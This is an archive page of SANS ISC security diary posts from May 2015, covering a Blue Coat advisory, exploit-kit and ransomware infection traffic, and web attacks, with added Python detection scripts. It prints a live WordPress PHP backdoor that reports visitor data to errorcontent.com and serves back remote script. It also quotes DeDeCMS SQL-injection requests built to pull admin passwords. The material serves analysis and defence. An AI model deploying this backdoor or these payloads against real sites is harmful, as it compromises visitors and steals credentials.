Diaries

Published: 2015-05-31

Blue Coat: SSL Visibility Appliance web based vulnerabilities

Blue Coat has released a security advisory for SSL Visibility Appliance. The SSL Visibility Appliance is susceptible to multiple web-based vulnerabilities in the administration console. A remote attacker can use these vulnerabilities to obtain administrative access to the SSL Visibility Appliance. All versions of SSL Visibility prior to 3.8.4 are vulnerable.

The vulnerabilities in the WebUI are:

  • Cross-Site Request Forgery (CVE-2015-2852): Cross-site request forgery (CSRF) vulnerability in the WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 allows remote attackers to hijack the authentication of administrators.

  • Clickjacking due to improper input validation (CVE-2015-2854): The WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 does not send a restrictive X-Frame-Options HTTP header, which allows remote attackers to conduct clickjacking attacks via vectors involving an IFRAME element.

  • Cookie theft (CVE-2015-2855): The WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 does not set the secure flag for the administrator's cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, a different vulnerability than CVE-2015-4138.

  • Session fixation (CVE-2015-2853): Session fixation vulnerability in the WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 allows remote attackers to hijack web sessions by providing a session ID.
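
As an added illustration (not part of the advisory or of ISC's text), the following Python audits a raw HTTP response for the two header-level defects listed above: a missing or permissive X-Frame-Options header, and session cookies issued without the Secure attribute. The responses it checks are constructed samples, not captures from an SSL Visibility appliance.

```python
# Constructed sample of an administration-console response carrying the two
# header defects from the advisory: no X-Frame-Options, and a session cookie
# issued over https without the Secure (or HttpOnly) attribute.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: sessionid=EXAMPLE-SESSION-TOKEN; Path=/\r\n"
    "\r\n"
    "<html><body>WebUI</body></html>"
)

# The same response after remediation (also constructed): framing denied and
# the cookie restricted to https and hidden from script.
FIXED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "X-Frame-Options: DENY\r\n"
    "Set-Cookie: sessionid=EXAMPLE-SESSION-TOKEN; Path=/; Secure; HttpOnly\r\n"
    "\r\n"
    "<html><body>WebUI</body></html>"
)


def parse_headers(raw):
    """Split a raw HTTP response into (status_line, [(name, value), ...]).

    Headers are kept as a list rather than a dict because Set-Cookie may
    legitimately appear more than once and each instance must be checked.
    """
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_response(raw, over_https=True):
    """Return the list of findings for the two header defects described above."""
    _status, headers = parse_headers(raw)
    findings = []

    # Clickjacking (CVE-2015-2854): a restrictive X-Frame-Options is expected.
    xfo = [v for n, v in headers if n == "x-frame-options"]
    if not xfo:
        findings.append("missing X-Frame-Options header")
    elif xfo[0].upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("non-restrictive X-Frame-Options: %s" % xfo[0])

    # Cookie theft (CVE-2015-2855): a cookie set in an https session needs the
    # Secure attribute so the browser never sends it over plain http.
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie = value.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in value.split(";")[1:]}
        if over_https and "secure" not in attrs:
            findings.append("cookie %s lacks Secure attribute" % cookie)
        if "httponly" not in attrs:
            findings.append("cookie %s lacks HttpOnly attribute" % cookie)
    return findings
```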


Workarounds:

Limit access to the SSL Visibility management port to trusted clients with limited access to the outside internet.  SSLV can be configured to limit the IP addresses capable of accessing the management port.

Limit administrative capabilities by assigning distinct roles for different types of administrators.

Use ProxySG and WebPulse to block access to malicious websites from clients.

Patches: 

SSL Visibility
SSLV 3.8 – a fix is available in 3.8.4.
SSLV 3.8.2f – a fix will not be provided.  Please upgrade to the latest release with the vulnerability fix.
SSLV 3.7.4 – a fix will not be provided.  Please upgrade to the latest release with the vulnerability fix.


For further details:

  1. https://bto.bluecoat.com/security-advisory/sa96
  2. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2852
  3. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2853
  4. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2854
  5. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2855

Published: 2015-05-30

Weekend Learning - Spoofer Project

Happy weekend, everyone. Oftentimes there is extra margin on the weekends to learn something new. This weekend I encourage you to consider learning more about the Spoofer project, as recommended by a fellow ISC Handler. With the recent announcement that the Spoofer project is funded and has clients for multiple operating systems, I encourage you to put this project on your weekend "to do list".

As a visual learner, I found their summary report listing the current state of source address spoofing compelling. As we all strive to improve our Cyber Security posture, efforts like the Spoofer project play a role in improving our "Cyber Hygiene".

Please use the comments section below to let us all know your experience.

Russell Eubanks
@russelleubanks


Published: 2015-05-29

Trust But Verify

Be intentional about how you spend your time. I believe that every person can incrementally improve their security program by being intentional about how they spend their time. One method is to be intentional about checking several items for compliance each and every month. While not intended to replace the value of an auditor, this approach can generate incremental value from the overall compliance process. If you are required to be in compliance with PCI, you are in luck! You could easily create a table that pairs one of the 12 categories with one of the 12 months in a calendar year. Inside each month, you could list several items that are important to verify. When printed out and kept nearby, it can serve as a reminder to be diligent about tracking progress over time. Compare this table year over year and look for trends that will help identify the sometimes small areas to focus on that can make a big impact.

I have used this approach to expect more out of myself and to set the bar just a little bit higher. I found success in showing this matrix to outside auditors and received positive feedback. There was nothing magic about this table; it just forced me to be intentional each and every month. Using this approach, unexpected "compliance drift" can be identified and remediated on a much more timely basis. This approach can be used with several of the regulatory compliance requirements. If you do not have one, ask friends and colleagues who do to learn what they find beneficial in their respective environments. As always, a great place to start is with the 20 Security Controls.

Can you make it easier on yourself to do the right thing by being intentional? I believe it is absolutely possible to leverage systems like this to make it easier to do the right thing.

What systems do you use to force you to be intentional? Please use the comments section to share what works for you.

Russell Eubanks
@russelleubanks


Published: 2015-05-28

Angler exploit kit pushing CryptoWall 3.0

Introduction

In the past two days, I've infected two hosts from Angler exploit kit (EK) domains at 216.245.213.0/24.  Both hosts were infected with CryptoWall 3.0 ransomware using the same bitcoin address for the ransom payment: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB

On Tuesday, 2015-05-26 at 15:17 UTC, I infected a host where Angler EK sent Bedep as a malware payload before getting CryptoWall 3.0 [1].  On Wednesday, 2015-05-27 at 17:30 UTC, I infected a host where Angler EK sent CryptoWall 3.0 as the malware payload.

I usually see Angler EK send different types of ransomware [2, 3], and I've seen plenty of CryptoWall 3.0 samples from Magnitude EK; however, this is the first time I've noticed CryptoWall from Angler EK.


Shown above: CryptoWall 3.0 decrypt instructions from the 2015-05-27 sample

Traffic from the infected host

CryptoWall 3.0 traffic has changed a bit from my first diary about it on 2015-01-19 [4].  Traffic below was seen from the infected host on 2015-05-27 starting at 17:30 UTC.


Shown above: Angler EK and CryptoWall 3.0 traffic as seen in Wireshark

Associated domains:

  • 216.245.213.5 port 80 - vanskeligstesjeverozapadne1.xadultchat.com - Angler EK
  • 91.184.19.41 port 80 - autorijschoolconsistent.nl - CryptoWall 3.0 check-in
  • 213.186.33.50 port 80 - jeanrey.fr - CryptoWall 3.0 check-in
  • 50.62.123.1 port 80 - 3bsgroup.com - CryptoWall 3.0 check-in
  • 75.103.83.9 port 80 - braingame.biz - CryptoWall 3.0 check-in
  • 62.221.204.114 port 80 - alsblueshelpt.nl - CryptoWall 3.0 check-in
  • 184.168.47.225 port 80 - ammorgan.net - CryptoWall 3.0 check-in
  • 79.96.220.223 port 80 - bezpiecznaswinka.pl - CryptoWall 3.0 check-in
  • 148.251.140.60 port 80 - asadiag.com - CryptoWall 3.0 check-in
  • 184.168.47.225 port 80 - alchemyofpresence.com - CryptoWall 3.0 check-in 
  • 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paygateawayoros.com - CryptoWall decrypt instructions
  • 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paymentgateposa.com - CryptoWall decrypt instructions
  • 7oqnsnzwwnm6zb7y.optionpaymentprak.com (didn't resolve in DNS) - CryptoWall decrypt instructions
  • 7oqnsnzwwnm6zb7y.watchdogpayment.com (didn't resolve in DNS) - CryptoWall decrypt instructions

Angler EK:

  • vanskeligstesjeverozapadne1.xadultchat.com - GET /molehill_inconsolably_erecting_prematureness/174208500231771131
  • vanskeligstesjeverozapadne1.xadultchat.com - GET /OEmjzR2jUP6JG0o9h494My_bK-qvpSFR6NcLcwz5j32hxI3s
  • vanskeligstesjeverozapadne1.xadultchat.com - GET /BjWMS7ksUcb9SztLJX7JlXe95voNnRcc7DfUJzRGbqTqKe8X

CryptoWall 3.0 check-in traffic:

  • ip-addr.es - GET /
  • autorijschoolconsistent.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=mr3jkiznke20nfh
  • jeanrey.fr - POST /wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?w=mr3jkiznke20nfh
  • 3bsgroup.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=mr3jkiznke20nfh
  • braingame.biz - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?x=mr3jkiznke20nfh
  • alsblueshelpt.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?n=mr3jkiznke20nfh
  • asambleadedios.org - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?z=mr3jkiznke20nfh
  • ammorgan.net - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?o=mr3jkiznke20nfh
  • bezpiecznaswinka.pl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?k=mr3jkiznke20nfh
  • asadiag.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?q=mr3jkiznke20nfh
  • alchemyofpresence.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?z=mr3jkiznke20nfh

Note: These URLs repeated several times with different random strings at the end.

Traffic caused by viewing the CryptoWall decrypt instructions in a browser:



Shown above: Emerging Threats-based Snort events on the infection traffic using Security Onion

Preliminary malware analysis

Malware payload delivered by Angler EK on 2015-05-27:

Final words

A pcap of the 2015-05-27 infection traffic is available at:

A zip file of the associated malware is available at:

The zip file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://malware-traffic-analysis.net/2015/05/26/index.html
[2] https://isc.sans.edu/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681
[3] http://malware-traffic-analysis.net/2015/03/25/index.html
[4] https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203


Published: 2015-05-26

Possible Wordpress Botnet C&C: errorcontent.com

Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments for readability):

#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */

/* only run the code if this is Chrome or IE and not a "bot" */
if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{
  # Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]
  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

  # check if we have the curl extension installed
  if (function_exists('curl_init') && function_exists('curl_exec')) {
    $ch= curl_init();
    curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $wp_8610mezd = curl_exec ($ch);
    curl_close($ch);
  }
  # if we don't have curl, try file_get_contents which requires allow_url_fopen.
  elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {
    $wp_8610mezd = @file_get_contents($wp_mezd098610);
  }
  # or try fopen as a last resort
  elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
    $wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));
  }
}

# The data retrieved will be echoed back to the user if it starts with the string "scr".
if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }


I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.
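
To hunt for other copies of this snippet, here is an added Python scanner (my own, not code from the diary or from the reader) that scores PHP files against the traits visible above: error suppression, the Gecko|MSIE / not-bot user-agent gating, the remote URL assembled from string fragments, the curl/file_get_contents/fopen fallback chain, and the echo of content whose second character starts "scr". The weights and threshold are my own choices, and the PHP samples inside it are constructed for the test.

```python
import os
import re

# Traits of the snippet above, as (regex, weight, description). The regexes
# are matched case-insensitively across lines; the weights are my own choice.
INDICATORS = [
    (r"error_reporting\s*\(\s*0\s*\)", 1, "error reporting disabled"),
    (r"ini_set\s*\(\s*['\"]display_errors['\"]\s*,\s*0\s*\)", 1, "error display disabled"),
    (r"preg_match\s*\(\s*['\"]/Gecko\|MSIE/i['\"]", 2, "serves only Gecko/MSIE user agents"),
    (r"!\s*preg_match\s*\(\s*['\"]/bot/i['\"]", 2, "excludes crawlers by user agent"),
    (r"['\"]http://['\"]\s*\.\s*(?:['\"][^'\"]{1,12}['\"]\s*\.\s*){2,}", 3,
     "remote URL assembled from string fragments"),
    (r"HTTP_USER_AGENT.{0,1000}REMOTE_ADDR.{0,200}HTTP_HOST", 2,
     "sends client IP, host name and user agent to the remote"),
    (r"curl_init.{0,500}file_get_contents.{0,500}fopen", 2,
     "curl / file_get_contents / fopen fallback chain"),
    (r"substr\s*\([^)]*\)\s*===\s*['\"]scr['\"]", 3,
     "echoes fetched content when it looks like a <script> tag"),
]


def scan_php_source(src):
    """Return (score, [descriptions]) for the indicators present in src."""
    score, hits = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, src, re.I | re.S):
            score += weight
            hits.append(label)
    return score, hits


def is_suspect(src, threshold=6):
    """Flag a file only when several weighted traits coincide; a lone
    error_reporting(0) is common in legitimate plugins and scores too low."""
    return scan_php_source(src)[0] >= threshold


def scan_tree(root, threshold=6):
    """Walk a document root; yield (path, score, hits) for suspect .php files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    score, hits = scan_php_source(fh.read())
            except OSError:
                continue
            if score >= threshold:
                yield path, score, hits


# Constructed test fixtures: a condensed form of the snippet above, and a
# benign plugin stub that fetches a remote resource the normal WordPress way.
SAMPLE_BACKDOOR = r'''<?php
error_reporting(0);
@ini_set('display_errors',0);
$ua = @$_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Gecko|MSIE/i', $ua) && !preg_match('/bot/i', $ua)) {
  $u = "http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($ua);
  if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); $r = curl_exec($ch); }
  elseif (@ini_get('allow_url_fopen')) { $r = @file_get_contents($u); }
  else { $r = @stream_get_contents(@fopen($u, "r")); }
  if (substr($r,1,3) === 'scr') { echo $r; }
}
'''

SAMPLE_BENIGN = r'''<?php
/* Plugin Name: Weather widget (constructed benign sample) */
error_reporting(0);
function ww_fetch() { return wp_remote_get('https://api.example.com/weather'); }
'''
```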

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Published: 2015-05-23

Business Value in "Big Data"

There is more and more information available about what Big Data really means. In the type of business most of us deal with daily, you are likely swamped by a huge amount of structured or unstructured data that is entirely, partially, or not at all collected. Some of the reasons to collect that data are competitive advantage, network security, operational issues, etc., but the real power of that information is in making timely decisions.

A study conducted by Forrester in 2011 estimated "[...] that firms effectively utilize less than 5% of available data. Why so little? The rest is simply too expensive to deal with."[1] That still leaves 95% of data untouched and unanalyzed. Depending on who you ask what Big Data means to them, you may get different answers such as volume, speed, variety, type and quality. Depending on the size of the network, you may lack the storage capacity to ingest and process everything the network is capable of generating, and must make difficult choices about what is most important to collect in order to make those timely decisions.

I think that in order to make significant gains in collecting Big Data, there is a need for a comprehensive approach to managing data and how it is analyzed to gain actionable intelligence. That means choosing the right data, turning structured or unstructured data into a common format (e.g. CEF is a widely supported format), reducing the data footprint by keeping and aggregating a single copy of similar data (deduplication), and having an archiving policy for old data.

We would like to hear from you. Are you currently evaluating what to do with your data, and based on your current security posture, do you think the data you currently collect is enough to get valuable insight into what is going on inside your network?

Note: If interested in sharing, Stephen Northcutt is currently looking for SEIM/SIEM success stories.

[1] http://blogs.forrester.com/brian_hopkins/11-09-30-big_data_will_help_shape_your_markets_next_big_winners
[2] https://protect724.hp.com/docs/DOC-1072
[3] https://www.linkedin.com/pulse/seimsiem-success-story-request-stephen-northcutt?trk=mp-reader-card

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2015-05-22

Lazy Coordinated Attacks Against Old Vulnerabilities

Typically we try to divide attackers into different groups, all the way from script kiddies (no resources, no skills, quite a bit of time/persistence) to more advanced state-sponsored attackers (lots of resources, decent skills and the ability to conduct long-lasting persistent attacks).

So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS being conducted from what looks like several IP addresses at the same time, which appeared to share the load.

The attack:

GET /uploads/plus/search.php?keyword=11&amp; typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"

DeDeCMS is a Drupal-like content management system popular in China [1]. Exploits like the one above have been used at least since 2013 [2]. The site that was attacked above does not use DeDeCMS, so the attacker did not do any reconnaissance.

The attacker also doesn't bother modifying the user agent and keeps the "Python-urllib/2.7" user agent, indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.

The SQL statement that is being attempted:

SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1

A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.

Sort of interesting: these were not the only attacks from these two IP addresses, and they did start out with some reconnaissance:

GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Here they spoof the Google user agent. They even first try out the "plus/search.php" URL:

GET //plus/search.php?keyword=as&typeArr[111%3D@`\x5C'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

But even though it returns a 404, they still proceed with the attack.
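
An added example (not from the diary) of detection logic over web-server access logs: it URL-decodes each request target, strips inline SQL comments and flags the error-based and UNION-style patterns seen above, plus the Python-urllib user agent the post says many WAFs block. The log lines are constructed in combined log format from the three requests quoted above; the client IPs are TEST-NET placeholders, not the real sources.

```python
import re
from urllib.parse import unquote_plus

# Combined log format; the request target is captured lazily up to " HTTP/x.y"
# because these probes contain literal spaces inside the query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rules evaluated against the decoded query string. They are tuned to the
# two DeDeCMS probes above, not meant as a general-purpose WAF ruleset.
SQLI_RULES = [
    ("information_schema", r"\binformation_schema\b"),
    ("union select", r"\bunion\b[\s/*!\d]{0,20}\bselect\b"),
    ("concat()", r"\bconcat\s*\("),
    ("floor(rand()) duplicate-key", r"\bfloor\s*\(\s*rand\s*\("),
    ("group by", r"\bgroup\s+by\b"),
    ("admin table", r"dede_admin|__admin"),
]

# User agents of scripted clients that the post notes many WAFs block outright.
TOOL_UA_PREFIXES = ("python-urllib/",)


def decode_query(query):
    """Percent/plus-decode the query (twice if a scanner double-encoded it)
    and blank out inline /* ... */ comments, so that the obfuscated
    SELECT/*'*/concat(...) reads as SELECT concat(...) for the rules."""
    decoded = unquote_plus(query)
    if "%" in decoded:
        decoded = unquote_plus(decoded)
    return re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)


def analyze_line(line):
    """Return a finding dict for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    decoded = decode_query(query)
    rules = [name for name, pat in SQLI_RULES if re.search(pat, decoded, re.I)]
    ua = m.group("ua")
    tool_ua = ua.lower().startswith(TOOL_UA_PREFIXES)
    return {
        "ip": m.group("ip"),
        "path": path,
        "status": int(m.group("status")),
        "ua": ua,
        "rules": rules,
        "tool_ua": tool_ua,
        "suspect": bool(rules) or tool_ua,
    }


def analyze_log(text):
    """Analyze every non-empty line; unparsable lines are skipped."""
    findings = (analyze_line(l) for l in text.splitlines() if l.strip())
    return [f for f in findings if f is not None]


# Constructed combined-log lines reproducing the three requests quoted in the
# post (recon, the UNION probe, the duplicate-key probe); 203.0.113.0/24 is
# a documentation range standing in for the real source addresses.
SAMPLE_LOG = r'''
203.0.113.10 - - [22/May/2015:03:14:15 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.10 - - [22/May/2015:03:14:16 +0000] "GET //plus/search.php?keyword=as&typeArr[111%3D@`\x5C'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.11 - - [22/May/2015:03:14:20 +0000] "GET /uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"
'''
```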


[1] http://dedecms.com
[2] http://0day5.com/archives/341

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Published: 2015-05-21

Exploit kits delivering Necurs

Introduction

In the past few days, we've seen Nuclear and Angler exploit kits (EKs) delivering malware identified as Necurs.  It certainly isn't the only payload sent from Nuclear and other EKs, but I hadn't really looked into EK traffic sending Necurs lately.

Documented as early as 2012, Necurs is a type of malware that opens a back door on the infected computer [1].  It may also disable antivirus products as well as download additional malware [1][2].

I saw Necurs as a malware payload from Nuclear and Angler EKs last week [3][4].  In each case, traffic went through a gate on 185.14.30.218 (between the compromised website and the EK landing page).

We ran across Nuclear EK delivering Necurs again on 2015-05-20.  In this example, the gate was on 91.121.63.249.

I can't share info on the compromised website that kicked off this infection chain; however, we can look at the rest of the traffic.

Infection traffic details

Associated domains:

  • 91.121.63.249 port 80 - try.jleveux.com - Redirect (gate) to exploit kit
  • 162.247.13.233 port 80 - os.jackmap.com -  Nuclear EK
  • 188.165.138.220 port 80 - 188.165.138.220 - Post-infection HTTP traffic caused by Necurs
  • various IP addresses on various ports - Other post-infection traffic (see below)


Shown above: Emerging Threats-based Snort events on the infection traffic using Security Onion

Redirect (gate) leading to the EK:

  • 2015-05-20 17:03:32 UTC - try.jleveux.com - GET /js/view.js

Nuclear EK:

  • 2015-05-20 17:03:32 UTC - os.jackmap.com - GET /CQEWFR9SHVgRTQkCAlwPAhNNAlgP.html
  • 2015-05-20 17:03:33 UTC - os.jackmap.com - GET /BE8SHwtVFUEeUh9SHVgRTQkCAlwPAhNNAlgPH1VVTwZaVE1VVhlTW1EfUANRUVJXUANTUB8FDQY
  • 2015-05-20 17:03:34 UTC - os.jackmap.com - GET /B14OBh8LV0MUH1IfUEsNEE0JAFQJDgITT1QNDh9VVxlTW1RNVwBMUltRHQZWUFFSVQZWUlAfVEsxIBARBkc
  • 2015-05-20 17:03:36 UTC - os.jackmap.com - GET /B14OBh8LV0MUH1IfHVgRTQkCAlwPAhNNAlgPH1VVTwZaVE1VVhlTW1EfUANRUVJXUANTUB9WHXIAJyE5MHM

HTTP POST requests from the infected host:

  • 2015-05-20 17:03:52 UTC - 188.165.138.220 - POST /forum/db.php
  • 2015-05-20 17:03:53 UTC - 188.165.138.220 - POST /forum/db.php
  • 2015-05-20 17:03:53 UTC - 188.165.138.220 - POST /forum/db.php
  • 2015-05-20 17:04:46 UTC - 188.165.138.220 - POST /forum/db.php

DGA-style DNS requests from the infected host:


UDP packets sent from the infected host:


TCP SYN packets sent by the infected host, with no response from the server:


Images from the traffic


Shown above: Link to the gate found in page from the compromised website


Shown above: The gate redirecting traffic to the Nuclear exploit kit landing page


Shown above: Nuclear exploit kit landing page


Shown above: Nuclear exploit kit sends a Flash exploit


Shown above: Nuclear exploit kit sends the malware payload


Shown above: HTTP traffic caused by the malware

Preliminary malware analysis

Malware payload delivered by the Nuclear exploit kit (Necurs)

Additional malware found on the infected host (Necurs-related):

Some of the registry keys for persistence:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_C4E6D8D66AF44D3\000\Control
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\c4e6d8d66af44d3
  • NOTE:  The same keys were also found in ControlSet001 and ControlSet002

Final words

A pcap of the infection traffic is available at:

A zip file of the associated malware is available at:

The zip file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://www.symantec.com/security_response/writeup.jsp?docid=2012-121212-2802-99
[2] https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Necurs
[3] http://malware-traffic-analysis.net/2015/05/14/index3.html
[4] http://malware-traffic-analysis.net/2015/05/15/index.html

Published: 2015-05-20

Logjam - vulnerabilities in Diffie-Hellman key exchange affect browsers and servers using TLS

There's a new vulnerability in town...   "The new bug, dubbed LogJam, is a cousin of Freak. But it’s in the basic design of TLS itself, meaning all Web browsers, and some email servers, are vulnerable." [1]  According to the article, "Internet-security experts crafted a fix for a previously undisclosed bug in security tools used by all modern Web browsers. But deploying the fix could break the Internet for thousands of websites."

Logjam attack can allow an attacker "to significantly weaken the encrypted connection between a user and a Web or email server..." [2]

From: https://weakdh.org/

Diffie-Hellman key exchange is a popular cryptographic algorithm that allows Internet protocols to agree on a shared key and negotiate a secure connection. It is fundamental to many protocols including HTTPS, SSH, IPsec, SMTPS, and protocols that rely on TLS.

We have uncovered several weaknesses in how Diffie-Hellman key exchange has been deployed...

We're starting to see news coverage from other outlets, and we're sure more analysis will emerge.  However, at this time your best source for more information on this bug is at weakdh.org.

For now, ensure you have the most recent version of your browser installed, and check for updates frequently.  If you’re a system administrator, please review the Guide to Deploying Diffie-Hellman for TLS at https://weakdh.org/sysadmin.html

--
Brad Duncan
ISC Handler and Security Researcher at Rackspace

References:

[1] http://www.wsj.com/articles/new-computer-bug-exposes-broad-security-flaws-1432076565
[2] http://www.pcworld.com/article/2924532/new-encryption-flaw-logjam-puts-web-surfers-at-risk.html


Published: 2015-05-20

Upatre/Dyre malspam - Subject: eFax message from "unknown"

Introduction

Yesterday on 2015-05-19, I attended a meeting from my local chapter of the Information Systems Security Association (ISSA).  During the meeting, one of the speakers discussed different levels of incident response by Security Operations Center (SOC) personnel.  For non-targeted issues like botnet-based malicious spam (malspam) infecting a Windows host, you probably won't waste valuable time investigating every little detail.  In most cases, you'll probably start the process to re-image the infected computer and move on.  Other suspicious events await, and they might reveal a more serious, targeted threat.

However, we still recover information about these malspam campaigns.  Traffic patterns evolve, and changes should be documented.

Today's example of malspam

Searching through my employer's blocked spam filters, I found the following Upatre/Dyre wave of malspam:

  • Date/Time: 2015-05-19 from 12:00 AM to 5:47 AM CST
  • Number of messages: 20
  • Sender (spoofed): sent@efax-mail.co.uk
  • Subject: eFax message from "unknown" - [random number] page(s)
  • Attachment: Fax_ewew_43434.zip

